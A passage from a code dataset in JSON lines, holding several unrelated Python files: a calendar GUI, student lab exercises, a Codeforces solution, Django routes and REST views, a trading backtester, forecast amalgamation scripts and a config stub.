pady=self.view.pady, sticky=\"NSEW\")\n\t\t# self.calender_sheet.change_theme(theme=\"dark blue\", redraw=True)\n\t\tself.calender_sheet.set_options(auto_resize_columns=True)\n\n\t\tself.calender_sheet.column_width(column=0, width=20)\n\t\tself.calender_sheet.column_width(column=1, width=240)\n\t\tself.calender_sheet.column_width(column=2, width=240)\n\t\tself.calender_sheet.column_width(column=3, width=70)\n\t\tself.calender_sheet.column_width(column=4, width=70)\n\n\t\tself.calender_sheet.enable_bindings(\"single_select\")\n\t\tself.calender_sheet.bind(\"\", self.click_calandar)\n\n\n\tdef update_window(self, data):\n\t\t\n\t\tself.year_combo.set(data[\"year\"])\n\t\tself.calender_sheet.set_sheet_data(data=data[\"calender\"],\n reset_col_positions=False,\n reset_row_positions=True,\n redraw=True,\n verify=False,\n reset_highlights=False,\n\t\t\t )\n\n\t\tself.year_combo.configure(values=data[\"years\"])\n\n\tdef click_calandar(self, event):\n\t\tcurrently_selected = self.calender_sheet.get_currently_selected()\n\t\tif currently_selected:\n\t\t\trow = currently_selected.row\n\t\t\tcolumn = currently_selected.column\n\n\t\t\tif column != 5:\n\t\t\t\ttrack = self.calender_sheet.get_cell_data(row, 2)\n\t\t\t\tself.view.controller.show_circuit_window(track)\n\t\t\t\tself.calender_sheet.deselect(row=row, column=column, redraw=True)\n\t\t\telse:\n\t\t\t\tself.view.controller.show_race_result(int(self.year_combo.get()), row)\n\n\tdef combobox_callback(self, event):\n\t\tself.view.controller.update_calender_window(int(self.year_combo.get()))","repo_name":"domhnallmorr/Team-Principal","sub_path":"src/view/calender_window.py","file_name":"calender_window.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14183324324","text":"def zad4():\n print(dir(\"naprzykład\"))\n help(\"naprzykład\".endswith(\"ok\") )\n#zad4()\n\n\ndef zad5():\n imie =\"Mateusz Śliwiński\"\n print(imie[::-1])\n\n\ndef zad6():\n lista=[1,2,3,4,5,6,7,8,9,10]\n lista2 = []\n\n for licznik in range(5):\n lista2.append(lista[5+licznik])\n\n for licznik in range(5):\n lista.pop()\n\n print(lista)\n print(lista2)\n\ndef zad8():\n krotka = (151270, 150044, \"Andrzej\", \"Mateusz\", \"Strzeszewski\", \"Śliwiski\")\n krotka_indeksów=krotka[0:2]\n krotka_imion=krotka[2:4]\n krotka_nazwisk=krotka[4:6]\n print(krotka_imion)\n print(krotka_indeksów)\n print(krotka_nazwisk)\n krotka_studenta1=krotka[0:1]+krotka[2:3]+krotka[4:5]\n print(krotka_studenta1)\n krotka_studenta2 = krotka[1:2] + krotka[3:4] + krotka[5:6]\n print(krotka_studenta2)\n#zad8()\n\n\n\ndef zad9():\n studenci = {\n 151270: (21, \"andrzej@andrzejowadomena.pl\", 1999, \"Warszawa ul Słoneczna 11\"),\n 150044: (21, \"mati@mati.pl\", 1999, \"Lubowidz ul. Zielona 6\"),\n }\n print(studenci[151270])\n\n\ndef zad10():\n numery = [1, 2, 2, 2, 2, 3, 56]\n numery = set(numery)\n print(numery)\n\ndef zad11():\n for i in range (11):\n print(i)\n\ndef zad12():\n for i in range(100, 15, -5):\n print(i)\n\n\n","repo_name":"Gojira99/PSI-Projekt","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25064820696","text":"# https://codeforces.com/contest/1365/problem/C\n\n\nimport collections\n\n\ndef eval(N, D1, D2):\n d1 = dict()\n d2 = dict()\n\n for i in range(N):\n d1[D1[i]] = i\n d2[D2[i]] = i\n\n Da = collections.defaultdict(int)\n Db = collections.defaultdict(int)\n\n for i in D1:\n # right move\n dd = d1[i] - d2[i]\n if dd == 0:\n l1 = 0\n elif dd < 0:\n l1 = dd + N\n else:\n l1 = dd\n\n # Left move\n dd2 = d2[i] - d1[i]\n if dd2 == 0:\n l2 = 0\n elif dd2 < 0:\n l2 = dd2\n else:\n l2 = dd2 - N\n\n Da[l1] += 1\n Db[l2] += 1\n\n print(max(max(Da.values()), max(Db.values())))\n\n\n# collect input:\nN = int(input())\nD1 = list(map(int, input().split()))\nD2 = list(map(int, input().split()))\neval(N, D1, D2)\n","repo_name":"jkfer/Codeforces","sub_path":"648/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27884626720","text":"from django.urls import path\nfrom .views import index, carrito, tienda, quienessomos, form_producto, \\\n lista_productos, form_cliente, lista_clientes, mod_producto, eliminar_producto, \\\n mod_cliente, eliminar_cliente, registro,agregar_producto, eliminar_prod, restar_producto, limpiar_carrito,\\\n comprar, historial\n\n \n\n\nurlpatterns = [\n path('', index, name=\"index\"),#el primer html que mostrara\n path('carrito', carrito, name=\"carrito\"),\n path('tienda', tienda, name=\"tienda\"),\n path('quienessomos', quienessomos, name=\"quienessomos\"),\n path('form_producto/', form_producto, name=\"form_producto\"),\n path('lista_productos/', lista_productos, name=\"lista_productos\"),\n path('form_cliente/', form_cliente, name=\"form_cliente\"),\n path('lista_clientes/', lista_clientes, name=\"lista_clientes\"),\n path('mod_producto/', mod_producto, name=\"mod_producto\"),\n path('eliminar_producto/', eliminar_producto, name=\"eliminar_producto\"),\n path('mod_cliente/', mod_cliente, name=\"mod_cliente\"),\n path('eliminar_cliente/', eliminar_cliente, name=\"eliminar_cliente\"),\n path('registro/', registro, name=\"registro\"),\n path('agregar//', agregar_producto, name=\"Add\"),\n path('eliminar//', eliminar_prod, name=\"Del\"),\n path('restar//', restar_producto, name=\"Sub\"),\n path('limpiar/', limpiar_carrito, name=\"CLS\"),\n path('comprar/', comprar, name=\"comprar\"),\n path('historial/', historial, name=\"historial\"),\n \n \n] ","repo_name":"udrax1/Django_Urbina_Blamey","sub_path":"petfriends/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71860713362","text":"import pandas as pd\r\nfrom pandas_datareader import data as pdr\r\nimport sys\r\nsys.path.append('C:/Users/Billy/Documents/PRISMO/Backtester')\r\nfrom base_model_backtest import backtest\r\nimport datetime\r\nimport os\r\nfrom tqdm import tqdm_notebook\r\nimport time\r\nimport numpy as np\r\nimport pickle\r\nfrom itertools import compress\r\n\r\n\r\nclass momentum_1(backtest):\r\n def __init__(self, \r\n timeSeries, \r\n inIndex,\r\n toTrade, \r\n shape, \r\n printBool, \r\n plotBool,\r\n decimalPlaces = 10,\r\n formationPeriod = None, \r\n logDir = None,\r\n capitalPerTrade = 100,\r\n decileQuantity = 10,\r\n holdingPeriod = 1,\r\n timeSeriesOpen = None,\r\n simeltaneouslyOpenTrades = 1):\r\n\r\n super().__init__(timeSeries, \r\n toTrade, \r\n shape, \r\n printBool, \r\n plotBool,\r\n decimalPlaces,\r\n lookback=formationPeriod,\r\n logDir=logDir)\r\n \r\n \r\n self.directory = logDir \r\n self.features = toTrade \r\n #Decimal Places should be assigned globally for transparency\r\n self.decimalPlaces = decimalPlaces\r\n self.timeSeries = timeSeries\r\n \r\n self.lookbackStd = 10\r\n self.lookbackMean = 10\r\n\r\n\r\n self.holdingPeriod = holdingPeriod\r\n self.T = formationPeriod #formation period\r\n self.decileQuantity = decileQuantity\r\n self.simeltaneouslyOpenTrades = simeltaneouslyOpenTrades #number of simeltaneous trades, per asset\r\n self.indexes = pd.MultiIndex.from_product([['returns','returnsCum','returnsMean','returnsStd','returnsRiskAdj'],list(self.features)])\r\n \r\n \r\n #Store all returns values\r\n self.returnsDf = pd.DataFrame(index = self.indexes)\r\n \r\n \r\n self.capitalPerTrade = capitalPerTrade\r\n \r\n #Blank template for new row\r\n self.newRow = pd.DataFrame(index = self.indexes)\r\n\r\n self.openPrices = timeSeriesOpen\r\n\r\n self.inIndexDf = inIndex\r\n self.featuresInIndex = None\r\n \r\n\r\n def run(self):\r\n # pls dont bully me for using a counter as an index, the enumerate function outpits price as a row not a pandas series F\r\n for index, row in enumerate(self.timeSeries.itertuples()):\r\n\r\n self.featuresInIndex = [x for x in compress(self.features, self.inIndexDf.iloc[index].tolist())]\r\n\r\n #Stupid but this creates a list of [date, price1, price2, ...]\r\n \r\n closePrices = row\r\n openPrices = [pd.DataFrame(self.openPrices.iloc[index]).columns[0]] + self.openPrices.iloc[index].tolist()\r\n \r\n #Create array of open orders to pass into strategy\r\n if self.orderbook is not None and len(self.orderbook)>0:\r\n openOrderBook = self.orderbook.loc[self.orderbook['openClosed']=='OPEN'] \r\n else:\r\n openOrderBook = None\r\n \r\n# print(date)\r\n \r\n orders = self.generate_signals(closePrices, openPrices, openOrderBook)\r\n# print(orders)\r\n \r\n self.tick(closePrices, orders)\r\n\r\n\r\n\r\n\r\n #Close all remaining orders\r\n #Create array of open orders to pass into strategy\r\n if self.orderbook is not None and len(self.orderbook)>0:\r\n openOrderBook = self.orderbook.loc[self.orderbook['openClosed']=='OPEN'] \r\n else:\r\n openOrderBook = None\r\n\r\n print(len(openOrderBook))\r\n orders = self.generate_signals(closePrices, openPrices, openOrderBook, closeAll = True)\r\n self.tick(closePrices, orders, closeAll = True)\r\n \r\n def generate_signals(self, closePriceRow, openPriceRow, openOrderBook, closeAll = False):\r\n\r\n orders = [] \r\n date = closePriceRow[0]\r\n yesterdaysDate = date - pd.DateOffset(1)\r\n \r\n #Update price history with the openPrices, as if its a new trading day and all we know is the open prices\r\n if closeAll != True:\r\n if self.dfOpenHistory is None:\r\n self.dfOpenHistory = pd.DataFrame([openPriceRow])\r\n self.dfOpenHistory.columns = ['Date'] + self.features\r\n self.dfOpenHistory.set_index(['Date'], inplace=True)\r\n else:\r\n temp = pd.DataFrame([openPriceRow])\r\n temp.columns = ['Date'] + self.features\r\n temp.set_index(['Date'], inplace=True)\r\n self.dfOpenHistory = pd.concat([self.dfOpenHistory, temp]) \r\n \r\n \r\n #Calculate returns values based on yesterdays prices and those preceeding that.\r\n if len(self.returnsDf.columns)==0 or len(self.dfHistory)<=2:\r\n self.returnsDf.loc[('returns',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = 0\r\n self.returnsDf.loc[('returnsRiskAdj',slice(None)), yesterdaysDate] = 0\r\n \r\n else:\r\n \r\n if len(self.dfHistory)>2:\r\n # Returns = P(final)/P(initial)-1\r\n self.returnsDf.loc[('returns',slice(None)), yesterdaysDate] =(self.dfHistory.iloc[-1]/self.dfHistory.iloc[-2]-1).values\r\n \r\n # CumulativeReturns = P(final)/P(final-T) - 1\r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = (self.dfHistory.iloc[-1]/self.dfHistory.iloc[-(self.T)]-1).values\r\n else:\r\n self.returnsDf.loc[('returnsCum',slice(None)), yesterdaysDate] = 0\r\n \r\n #Average of values of returns \r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(self.T).mean().iloc[-1].values\r\n else:\r\n self.returnsDf.loc[('returnsMean',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(len(self.returnsDf.columns)).mean().iloc[-1].values\r\n \r\n #Standard Deviation of returns\r\n if len(self.returnsDf.columns)>self.T:\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(self.T).std().iloc[-1].values\r\n else:\r\n self.returnsDf.loc[('returnsStd',slice(None)), yesterdaysDate] = self.returnsDf.T.returns.rolling(len(self.returnsDf.columns)).std().iloc[-1].values\r\n \r\n #Risk Adjusted Returns\r\n meanRet = self.returnsDf.T.returnsMean.iloc[-1]\r\n stdRet = self.returnsDf.T.returnsStd.iloc[-1]\r\n riskAdjRet = meanRet/stdRet\r\n self.returnsDf.loc[('returnsRiskAdj',slice(None)), yesterdaysDate] = riskAdjRet.values\r\n \r\n\r\n\r\n\r\n ##### TO DELETE #####\r\n #Help out the thicc memory issues \r\n if len(self.returnsDf)>self.T:\r\n self.returnsDf = self.returnsDf[self.returnsDf.columns[-(self.T+1):]]\r\n self.dfOpenHistory = self.dfOpenHistory.iloc[-(self.T+1):]\r\n try:\r\n self.orderbook = self.orderbook.loc[self.orderbook.openClosed == 'OPEN']\r\n except Exception as e:\r\n pass\r\n\r\n# print(self.dfHistory, self.dfHistory)\r\n \r\n\r\n # print(date, yesterdaysDate, self.returnsDf.loc['returnsRiskAdj'])\r\n\r\n # Seperate into quantiles\r\n \r\n codesTop = (self.returnsDf.dropna().loc[('returnsRiskAdj',self.featuresInIndex), yesterdaysDate].sort_values()).iloc[-self.decileQuantity:].index.codes[1]\r\n codesBottom = (self.returnsDf.dropna().loc[('returnsRiskAdj',self.featuresInIndex), yesterdaysDate].sort_values()).iloc[:self.decileQuantity].index.codes[1]\r\n \r\n# print(self.returnsDf.dropna().loc[('returnsRiskAdj',slice(None)), date].sort_values())\r\n# print(self.returnsDf.index.levels[1][codesTop])\r\n# print(self.returnsDf.index.levels[1][codesBottom])\r\n \r\n\r\n\r\n\r\n\r\n #We should close all orders on the close price\r\n\r\n #Close all open orders on each tick\r\n if openOrderBook is not None:\r\n for index, openOrder in openOrderBook.iterrows():\r\n\r\n signal = openOrder[1]\r\n asset = openOrder[2]\r\n oldDate = openOrder[5]\r\n quantityTrade = round(openOrder[3], self.decimalPlaces)\r\n price = round(openOrder[4], self.decimalPlaces)\r\n orderID = openOrder[0]\r\n newDate = closePriceRow[0]\r\n newOrder = None \r\n \r\n\r\n #IF: date is >= than buying date + holding period\r\n if (signal == 'SELL'and newDate >= oldDate + pd.DateOffset(self.holdingPeriod)) or closeAll == True:\r\n newSignal = 'BUY'\r\n newQuantityTrade = -quantityTrade\r\n newPrice = self.dfHistory[asset].iloc[-1]\r\n \r\n if np.isnan(newPrice):\r\n pass\r\n else:\r\n #['ID','BUY/SELL','asset','quantity','price','date','OPEN/CLOSED']\r\n newOrder = [orderID, newSignal, asset, newQuantityTrade, newPrice, newDate,'CLOSED']\r\n orders.append(newOrder)\r\n\r\n if (signal == 'BUY' and newDate >= oldDate + pd.DateOffset(self.holdingPeriod)) or closeAll == True:\r\n newSignal = 'SELL'\r\n newQuantityTrade = -quantityTrade\r\n newPrice = self.dfHistory[asset].iloc[-1]\r\n\r\n \r\n if np.isnan(newPrice):\r\n pass\r\n else:\r\n #['ID','BUY/SELL','asset','quantity','price','date','OPEN/CLOSED']\r\n newOrder = [orderID, newSignal, asset, newQuantityTrade, newPrice, newDate,'CLOSED']\r\n orders.append(newOrder)\r\n\r\n\r\n\r\n # #TEST: only want to buy stocks when there are no currently open orders.\r\n openOrders = False\r\n if (openOrderBook is not None ) and len(orders)+len(openOrderBook)>=self.decileQuantity*(self.simeltaneouslyOpenTrades+1):\r\n openOrders = True\r\n\r\n\r\n #It's not good enough to just filter 'if stock price is in index'. This results in trades not occurring at a all.\r\n if len(self.returnsDf.columns)>self.T and closeAll != True and openOrders == False:\r\n\r\n # Create buy orders for stocks in top quantile for risk adj. returns, and create short orders for the others\r\n for topQuantileTick in list(self.returnsDf.index.levels[1][codesTop]):\r\n price = self.dfOpenHistory[topQuantileTick].iloc[-1]\r\n\r\n\r\n #CTEST: heck if the asset is in the open order book. DOn't buy if so\r\n tickOpen = False\r\n # if openOrderBook is not None:\r\n # if topQuantileTick in list(openOrderBook.asset):\r\n # tickOpen = True\r\n\r\n\r\n\r\n #topQuantileTick not in list(openOrderBook.asset) implies there are no currently open orders for the said asset.\r\n if not np.isnan(price) and topQuantileTick and tickOpen == False:\r\n quantity = float(self.capitalPerTrade/price)\r\n orders.append([None, 'BUY', topQuantileTick, quantity, price, date, 'OPEN'])\r\n\r\n for bottomQuantileTick in list(self.returnsDf.index.levels[1][codesBottom]):\r\n\r\n price = self.dfOpenHistory[bottomQuantileTick].iloc[-1]\r\n\r\n #CTEST: heck if the asset is in the open order book. DOn't buy if so\r\n tickOpen = False\r\n # if openOrderBook is not None:\r\n # if topQuantileTick in list(openOrderBook.asset):\r\n # tickOpen = True\r\n\r\n\r\n if not np.isnan(price) and tickOpen == False:\r\n quantity = float(-self.capitalPerTrade/price)\r\n orders.append([None, 'SELL', bottomQuantileTick, quantity, price, date, 'OPEN'])\r\n\r\n\r\n\r\n #Update price history with the close prices\r\n if closeAll != True:\r\n\r\n if self.dfHistory is None:\r\n self.dfHistory = pd.DataFrame([closePriceRow])\r\n self.dfHistory.columns = ['Date'] + self.features\r\n self.dfHistory.set_index(['Date'], inplace=True)\r\n else:\r\n temp = pd.DataFrame([closePriceRow])\r\n temp.columns = ['Date'] + self.features\r\n temp.set_index(['Date'], inplace=True)\r\n self.dfHistory = pd.concat([self.dfHistory, temp]) \r\n \r\n\r\n return orders","repo_name":"BillyRobertson/PRISMO-trading-research-and-execution-system","sub_path":"Backtester/models/momentum_1_adjRisk.py","file_name":"momentum_1_adjRisk.py","file_ext":"py","file_size_in_byte":13222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71985845522","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\nimport pandas as pd \nimport numpy as np\n\nfrom utils.utils import *\nfrom utils.clarkWestTest import clarkWestTest\n\n\ndef readFile(architecture, dataset, variable, hidden = None):\n if(hidden is not None):\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n else: \n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n return results\n\n\n# # Amalagamation\n# The main idea is to do an amalgamation per variable: i.e. the predictions of all architecture at time point t and take the average of those. This begs the question of how to combine them. For example LSTM1/CNN1 does not have the same structure as FNN1. \n#\n# Amalgamtion of the all models should be doable, things get more complicated once we start looking at all the variables.\n#\n# * Amalagamation MEV\n# * Amalgamation TA\n# * Amalgamtion ALL \n# * Amalgamation PCA MEV\n# * Amalgamation PCA TA\n# * Amalgamation PCA ALL\n# * Amalgamtion per MEV variable \n# * Amalgamation per TA variable \n\n# +\ndef amalgamateResults(results, architectures, dataset, PCA = False): \n \"\"\"\n The main idea is that I try to aggregate the predictions over all architectures with all hidden units for a single variable. Thus aggregatedict is a dictionairy with dataframe of all the predictions per varaible.\n Thus aggregatedDict{'DP'} would yield a dataframe where each column is the prediction vector of a architecture. Aka, when you take the row wise average you have an amalgamation for a variable based on all models. \n \"\"\"\n aggregatedDict = dict()\n variables = results.Dataset.unique()\n models = results.Method.unique()\n\n \n for architecture in architectures:\n # Set the hidden unit definition depending on the architecture\n if(architecture == 'CNN' or architecture == 'RF'):\n hidden_sizes = None\n elif(architecture == 'MLP' or architecture == 'LSTM'):\n hidden_sizes = [32, 16, 8, 4, 2]\n else:\n hidden_sizes = [[32], [32, 16], [32, 16, 8], [32, 16, 8, 4], [32, 16, 8, 4, 2]] \n\n for variable in variables:\n variable = variable.replace(dataset+': ', '')\n \n # Edge case for PCA dataset with different naming convention.\n if(PCA == True):\n variable = 'PCA'\n if(hidden_sizes is not None):\n for hidden in hidden_sizes:\n #If we are dealing with ALL models, then file naming has a different sctructure.\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '.gzip')\n else:\n #For each variation of a certain variable read the relevant file and concatenate the predictions to the dataframe stored in the aggrefatedDict dictionairy for said variable.\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(hidden).replace('[', '').replace(']', '').replace(', ', '_') + '_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n try:\n df = pd.concat([aggregatedDict.get(variable), results.Pred], axis = 1)\n except:\n df = results.Pred\n aggregatedDict.update({variable: df})\n\n #For the architectures withouth hidden units, those are irrelevant. \n elif(hidden_sizes is None):\n #If we are dealing with ALL models, then file naming has a different sctructure.\n if(variable == 'ALL'):\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) + '.gzip')\n else:\n results = pd.read_parquet('output/' + str(architecture) + '_' + str(dataset) +'_' + str(variable).replace(' ', '').replace('%', '') + '.gzip')\n \n try:\n df = pd.concat([aggregatedDict.get(variable), results.Pred], axis = 1)\n except:\n df = results.Pred\n aggregatedDict.update({variable: df})\n \n return aggregatedDict\n \n \n# -\n\ndef getAmalgamationResults(results, aggregatedDict, dataset, PCA = False):\n resultsDF = pd.DataFrame(columns=['Method', 'Dataset', 'R2', 'CW', 'DA', 'DA HA', 'MSFE', 'MSFE HA'])\n variables = results.Dataset.unique()\n models = results.Method.unique()\n \n # Get the amalgamation performance for each variable\n for variable in variables:\n variable = variable.replace(dataset+': ', '')\n \n if(PCA == True):\n variable = 'PCA'\n \n #Get the amalgamated (row wise average over all model predictions) prediction for a variable\n pred = aggregatedDict.get(variable).mean(axis=1)\n\n #Get the actual and HA from any file, they are identical in all. \n results = readFile('MLP', dataset , str(variable), [32])\n\n # Replace the predictions int he dataframe with the amalgamated predictions\n results.Pred = pred\n \n if(variable is not 'ALL'):\n # Edge case for PCA dataset with different naming convention.\n \n resultsDF = analyzeResults(results, resultsDF, 'Amalgamation', dataset + ': ' + str(variable))\n else: \n resultsDF = analyzeResults(results, resultsDF, 'Amalgamation', str(variable))\n \n return resultsDF\n\n\n\n# ### Amalgamation per variable MEV\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='MEV Variables', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'MEV'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsMEV = getAmalgamationResults(results, aggregatedDict, dataset = 'MEV')\nresultsMEV\n# -\n\n# ### Amalgamation per variable TA\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='TA Variables', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'TA'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsTA = getAmalgamationResults(results, aggregatedDict, dataset = 'TA')\nresultsTA\n# -\n\n# ### Amalgamation for ALL model (MEV + TA)\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy All', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'ALL'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsALL = getAmalgamationResults(results, aggregatedDict, dataset = 'ALL')\nresultsALL\n# -\n\n# ### Amalgamation for PCA model (MEV, TA, MEV + TA)\n\n# +\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'MEV']\narchitectures = ['CNN', 'MLP', 'FNN']\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, 'MEV', PCA = True)\n\n# Get results based on amalgamation\nresultsPCA = getAmalgamationResults(results, aggregatedDict, dataset = 'MEV', PCA = True)\n\n# Redo analysis for TA only PCA models\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'TA']\naggregatedDict = amalgamateResults(results, architectures, 'TA', PCA = True)\nresultsPCA = resultsPCA.append(getAmalgamationResults(results, aggregatedDict, dataset = 'TA', PCA = True))\n\n# Redo analysis for TA+MEV PCA models\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'ALL']\naggregatedDict = amalgamateResults(results, architectures, 'ALL', PCA = True)\nresultsPCA = resultsPCA.append(getAmalgamationResults(results, aggregatedDict, dataset = 'ALL', PCA = True))\n\nresultsPCA\n# -\n\n\n\n\n","repo_name":"lex-koelewijn/Thesis_Asset_Price_Forecasting","sub_path":"Amalgamation.py","file_name":"Amalgamation.py","file_ext":"py","file_size_in_byte":9099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5494298747","text":"from django.conf import settings\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.serializer import (\n DistrictUnitsMetrobusSerializer,\n TokenDistrictUnitsMetrobusSerializer,\n UnitMetrobusSerializer,\n UnitUbicationMetrobusSerializer,\n)\n\n# Create your views here.\n\n\nclass UnitsMetrobusViewSet(GenericViewSet):\n\n queryset = []\n site_api_cdmx = \"https://datos.cdmx.gob.mx/api/3/action/datastore_search\"\n api_cdmx = site_api_cdmx + \"?resource_id=ad360a0e-b42f-482c-af12-1fd72140032e\"\n\n \"\"\"This view shows all the units its a intermediate url to the consumed api\"\"\"\n\n def list(self, *args, **kwargs):\n params = self.request.query_params\n limit_query = \"11\" if \"limit\" not in params else params[\"limit\"]\n query_offset = \"\" if \"offset\" not in params else \"&offset=\" + params[\"offset\"]\n\n url = self.api_cdmx + \"&limit=\" + limit_query + query_offset\n serializer = UnitMetrobusSerializer({\"url\": url})\n return Response(serializer.data[\"results\"])\n\n \"\"\"This view show one unit and its ubication\"\"\"\n\n def retrieve(self, request, *args, **kwargs):\n id_unit = kwargs[\"pk\"]\n serializer = UnitUbicationMetrobusSerializer({\"id\": id_unit})\n return Response(serializer.data[\"unit\"])\n\n\nclass DistrictsViewSet(GenericViewSet):\n\n queryset = []\n\n \"\"\"This is the view to return the dictricts (alcaldias)\"\"\"\n\n def list(self, *args, **kwargs):\n return Response(settings.DISTRICTS)\n\n \"\"\"\n This view send a task to update the the db\n returns a couples of urls witch have the respectives\n queries, to get the units for a district.\n \"\"\"\n\n def retrieve(self, request, *args, **kwargs):\n\n district = kwargs[\"pk\"]\n\n serializer = DistrictUnitsMetrobusSerializer(data={\"district\": district})\n\n serializer.is_valid(raise_exception=True)\n\n data = serializer.save()\n\n return Response(data)\n\n \"\"\"\n This view shows the units for a district (alcaldia)\n and the state of the task wich is getting the units for the current district\n \"\"\"\n\n @action(\n methods=[\n \"GET\",\n ],\n detail=True,\n url_name=\"units\",\n url_path=\"units\",\n )\n def get_units(self, request, *args, **kwargs):\n district = kwargs[\"pk\"]\n token = request.query_params.get(\"token\", \"\")\n data = {\"token\": token, \"district\": district}\n serilaizer = TokenDistrictUnitsMetrobusSerializer(data=data)\n serilaizer.is_valid(raise_exception=True)\n data = serilaizer.save()\n return Response(data)\n","repo_name":"xd860xd/transpot_cdmx","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15344661882","text":"# 7. Given a string, compute recursively (no loops) a new string where all the\n# lowercase 'x' chars have been changed to 'y' chars.\n\ndef change(characters):\n\n if len(characters) == 0:\n return ''\n\n elif characters[0] == 'x':\n return 'y' + change(characters[1:])\n\n else:\n return characters[0] + change(characters[1:])\n\nprint(change('xxxdxxxdxxxgxxxxhxx'))\n","repo_name":"greenfox-zerda-lasers/bereczb","sub_path":"week-04/day-4/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10331559055","text":"from data_utils import shared_utils\nfrom eval_utils import eval_shared_modules\nfrom transformers import AutoTokenizer\n\nclass BaseConfig(object):\n def __init__(self, args):\n self.epochs = args.epoch\n self.batch_size = args.batch\n self.device = args.device\n self.fold = args.fold\n\n self.input_size = args.input_size\n self.hidden_size = args.hidden_size\n self.num_layers = args.num_layers\n\n self.model_mode = args.model_mode\n self.model_type = args.model_type\n self.file_type = args.file_type\n self.stage_model = args.stage_model\n self.program_mode = args.program_mode\n self.position_sys = args.position_sys\n\n self.path = PathConfig(self.device, self.program_mode)\n self.val = GlobalConfig(self.position_sys)\n\n if \"bert\" in self.model_mode:\n self.bert_tokenizer = AutoTokenizer.from_pretrained(self.model_mode)\n \n \nclass PathConfig(object):\n def __init__(self, file_type, program_mode):\n self.standard_path = {\n \"train\": \"../data/train.txt\",\n \"test\": \"../data/test.txt\",\n \"dev\": \"../data/dev.txt\"\n }\n\n self.bert_model_path = \"bert-base-multilingual-cased\"\n self.pre_process_path = \"../data/preprocess/\"\n self.pre_process_data = {\n \"train\": \"../data/preprocess/train_data.pkl\",\n \"dev\": \"../data/preprocess/dev_data.pkl\",\n \"test\": \"../data/preprocess/test_data.pkl\"\n }\n\nclass GlobalConfig(object):\n def __init__(self, position_sys):\n self.elem_col = 